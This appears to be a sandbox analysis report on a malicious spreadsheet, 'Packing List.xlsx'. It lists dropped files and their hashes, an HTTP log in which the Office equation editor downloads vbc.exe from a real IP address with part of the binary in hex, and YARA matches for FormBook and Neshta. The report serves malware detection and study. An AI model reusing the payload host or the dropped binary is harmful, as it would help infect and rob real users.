          Preview: $T......u.B.L..{A.x..<.+............f..i......!...~.....l.N.. ..sZ....T.C..r..@z..7..z..uQ..+..7;....1..wP.R..........r..<2.......M.._.;..hn,k.........m.g....p.........y...R.Lk..c...}~.%.:J.Sk..$.8..b..6{.DvQC.3X8....z.F.a....b.@v.".BwF.`..M.l.......cJ..{.x..<)..Jf.m......f....H...C!...~.....l....Z....... e..... ..c^.m..zs.0.&.C......2.b.9..^.bT..........r..<).....t.MM._.;..hn,k...........g....p.........y...R.Lk..]..^}~.%.:J.Sk..$.8..b..6{.DvQC.3X8....z.F.a....b.@v.".. .B`....l..q....f.J^.{.x..<.+j.N.n....}.B..f.qe..G...>!...~....Ml....Z..3... e....t . c^.m..E..0.&zC.<....[.b.9.IV..NV..u....,..r.<2.......M.._.;.Zhn../....A...m.e....p.R.......y...R.Lkl.t~...~.<.:J...7.8..b..6{.DvQC.3X8L...\uL.~...UY.@v.(.B.F.`..m.l.......f.......4..<.+j.N......g....f..i......!.......Ml....Z..).&... ....>t .bc^.m...s...&zC.<....[.b.9..^.b+..........r..<2.......M.._.;..hn,k.........m.g....p.........y...R.Lk..c...}~.%.:J.Sk..$.8..b..6{.DvQC.3X8....
          C:\Users\user\AppData\Local\Temp\nsn3BBA.tmp\oxtrp.dll
          Process:C:\Users\Public\vbc.exe
          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):20992
          Entropy (8bit):6.645655834323537
          Encrypted:false
          SSDEEP:384:nTkovDTYAYG93/Z+OPtBRDslWhbWh8hDzMWVYi68catJsIf:nTbvDTgG931PhlpWqHMirtJs
          MD5:C2C405109B51233DEF2B5BF15FFD2308
          SHA1:14DEBD98B26EDBA7788AAFCAA41F1D32E8FE1CBC
          SHA-256:7E16ED39BA05C887E6D1B470B6CC8DE06FD67ED81FB2DA85F645CFBC643CA154
          SHA-512:1C209D4110DC5295D5BA951CF5A22D62AB1BF65D9B5BF66F4C6A2E8E2F2CFD339F06CDDF6B956D5F9A567EC8206D607753833CE94E14149D5BBC1B596C91B80B
          Malicious:false
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......xH..<)j.<)j.<)j...=)j..6n.>)j.5d.=)j..6`.8)j.(Bk./)j.<)k.x)j.wn.=)j.wj.=)j.w..=)j.wh.=)j.Rich<)j.........PE..L.....xa...........!.....$...*...............@............................................@..........................A..H...4C.......p..............................pA...............................................@..0............................text....#.......$.................. ..`.rdata.......@.......(..............@..@.data...$....P.......2..............@....rsrc........p.......L..............@..@.reloc...............N..............@..B........................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Temp\~DF3DF424E48F9DA5FE.TMP
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):512
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:BF619EAC0CDF3F68D496EA9344137E8B
          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
          Malicious:false
          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Temp\~DF60529B904FCF6857.TMP
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):512
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:BF619EAC0CDF3F68D496EA9344137E8B
          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
          Malicious:false
          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Temp\~DF63AE2933B69E3EF1.TMP
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:CDFV2 Encrypted
          Category:dropped
          Size (bytes):451944
          Entropy (8bit):7.98024010518001
          Encrypted:false
          SSDEEP:12288:brdtzdj7T2ZxWRnxyAu27GV72NVVM8wGu2nni:nPzdj7TAWR9u27GkvwZ2ni
          MD5:74C72F37E68BC3A8071467DD12BFAA7F
          SHA1:5DD9599FDE86870F52169A85CFB76020F504E43C
          SHA-256:DE736EAF65C73F1AEF5B09AA639D82E44129AC1300FD5411CAB342E9E33FAF7C
          SHA-512:57E17452A213D2FBFE4C84B80360853068C0EA2A7FD1293B1F05A44B4370BD8E90A565C0D31515AF3183A59A259D6E679DD436D1D17632ABF6E195DA9C3A27BB
          Malicious:false
          Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
          C:\Users\user\AppData\Local\Temp\~DFB3F4E2B4E1F422B3.TMP
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):512
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:BF619EAC0CDF3F68D496EA9344137E8B
          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
          Malicious:false
          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\Desktop\~$Packing List.xlsx
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):165
          Entropy (8bit):1.4377382811115937
          Encrypted:false
          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
          MD5:797869BB881CFBCDAC2064F92B26E46F
          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
          Malicious:true
          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          C:\Users\Public\vbc.exe
          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
          Category:dropped
          Size (bytes):235529
          Entropy (8bit):7.915461873573666
          Encrypted:false
          SSDEEP:6144:wBlL/c2HMSZ54elOp0S4jfEpGibIsdpwBQ:Ce2HMSZWeO0S4Mh0gS6
          MD5:DF330AB2A2E5AA4AC947315EE3F93992
          SHA1:76B5D1EEE342B47FE58E2136A067712CBD210351
          SHA-256:99A897C5B8F53E1D04E51107C748A4F385B754A852CA6B605559F5B50820A64F
          SHA-512:E65F573D68E8F198024028D553210095173D1551E6074B60D9543977116A0286F75641F4692049A49E6CD03729B001027136419D6CF0C71645E800D5522ED895
          Malicious:true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t.......................................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................

          Static File Info

          General

          File type:CDFV2 Encrypted
          Entropy (8bit):7.98024010518001
          TrID:
          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
          File name:Packing List.xlsx
          File size:451944
          MD5:74c72f37e68bc3a8071467dd12bfaa7f
          SHA1:5dd9599fde86870f52169a85cfb76020f504e43c
          SHA256:de736eaf65c73f1aef5b09aa639d82e44129ac1300fd5411cab342e9e33faf7c
          SHA512:57e17452a213d2fbfe4c84b80360853068c0ea2a7fd1293b1f05a44b4370bd8e90a565c0d31515af3183a59a259d6e679dd436d1d17632abf6e195da9c3a27bb
          SSDEEP:12288:brdtzdj7T2ZxWRnxyAu27GV72NVVM8wGu2nni:nPzdj7TAWR9u27GkvwZ2ni
          File Content Preview:........................>......................................................................................................................................................................................................................................

          File Icon

          Icon Hash:e4e2aa8aa4b4bcb4

          Network Behavior

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Oct 27, 2021 16:33:29.706020117 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:29.819412947 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:29.819586992 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:29.820317984 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:29.934331894 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:29.934392929 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:29.934432030 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:29.934470892 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:29.934607029 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:29.934632063 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.048571110 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.048635006 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.048814058 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.048844099 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.048872948 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.048896074 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.048923016 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.048927069 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.048933029 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.048949957 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.048964977 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.048979044 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.048990011 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.049005985 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.049014091 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.049082994 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.162086964 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.162128925 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.162151098 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.162168980 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.162185907 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.162206888 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.162230968 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.162256956 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.162280083 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.162305117 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.162311077 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.162328959 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.162343979 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.162353992 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.162368059 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.162375927 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.162390947 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.162401915 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.162409067 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.162425995 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.162434101 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.162465096 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.165993929 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.275465965 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275494099 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275515079 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275537014 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275557995 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275578976 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275619030 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275639057 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275660038 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275681019 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275701046 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275722980 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275743008 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275763035 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275768995 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.275784969 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275805950 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.275826931 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275842905 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.275849104 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275871038 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275875092 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.275891066 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275908947 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.275913000 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275933981 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275940895 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.275955915 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275976896 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.275985003 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.275998116 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.276010990 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.276019096 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.276038885 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.276041985 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.276060104 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.276070118 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.276081085 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.276101112 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.276104927 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.276120901 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.276135921 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.276143074 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.276166916 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.276194096 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.278616905 CEST4916780192.168.2.22192.227.228.38
          Oct 27, 2021 16:33:30.389725924 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.389767885 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.389791012 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.389812946 CEST8049167192.227.228.38192.168.2.22
          Oct 27, 2021 16:33:30.389834881 CEST8049167192.227.228.38192.168.2.22

          HTTP Request Dependency Graph

          • 192.227.228.38

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortProcess
          0192.168.2.2249167192.227.228.3880C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          TimestampkBytes transferredDirectionData
          Oct 27, 2021 16:33:29.820317984 CEST0OUTGET /0078/vbc.exe HTTP/1.1
          Accept: */*
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: 192.227.228.38
          Connection: Keep-Alive
          Oct 27, 2021 16:33:29.934331894 CEST1INHTTP/1.1 200 OK
          Date: Thu, 28 Oct 2021 11:38:05 GMT
          Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
          Last-Modified: Wed, 27 Oct 2021 06:07:30 GMT
          ETag: "39809-5cf4f68c9b908"
          Accept-Ranges: bytes
          Content-Length: 235529
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: application/x-msdownload
          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$0(QFQFQF*^QFQGqQF*^QFrvQF.W@QFRichQFPELe:V\0p@tp|.textZ\ `.rdatap`@@.data8r@.ndataP.rsrcx@@


          Code Manipulations

          Statistics

          Behavior

          Click to jump to process

          System Behavior

          Analysis Process: EXCEL.EXE PID: 1292 Parent PID: 596

          General

          Start time:16:32:21
          Start date:27/10/2021
          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          Wow64 process (32bit):false
          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Imagebase:0x13f0f0000
          File size:28253536 bytes
          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Analysis Process: EQNEDT32.EXE PID: 1532 Parent PID: 596

          General

          Start time:16:32:44
          Start date:27/10/2021
          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          Wow64 process (32bit):true
          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Imagebase:0x400000
          File size:543304 bytes
          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Analysis Process: vbc.exe PID: 1836 Parent PID: 1532

          General

          Start time:16:32:47
          Start date:27/10/2021
          Path:C:\Users\Public\vbc.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\Public\vbc.exe'
          Imagebase:0x400000
          File size:235529 bytes
          MD5 hash:DF330AB2A2E5AA4AC947315EE3F93992
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000005.00000002.488911564.00000000030B0000.00000004.00000001.sdmp, Author: Florian Roth
          Antivirus matches:
          • Detection: 100%, Joe Sandbox ML
          Reputation:low

          Analysis Process: vbc.exe PID: 2228 Parent PID: 1836

          General

          Start time:16:32:49
          Start date:27/10/2021
          Path:C:\Users\Public\vbc.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\Public\vbc.exe'
          Imagebase:0x400000
          File size:235529 bytes
          MD5 hash:DF330AB2A2E5AA4AC947315EE3F93992
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.476970202.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.476210300.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.475402924.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.482711816.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.479470505.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.480530429.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.484429588.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.486527655.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.478490697.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000006.00000000.474755506.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
          Reputation:low

          Disassembly

          Code Analysis

          Reset < >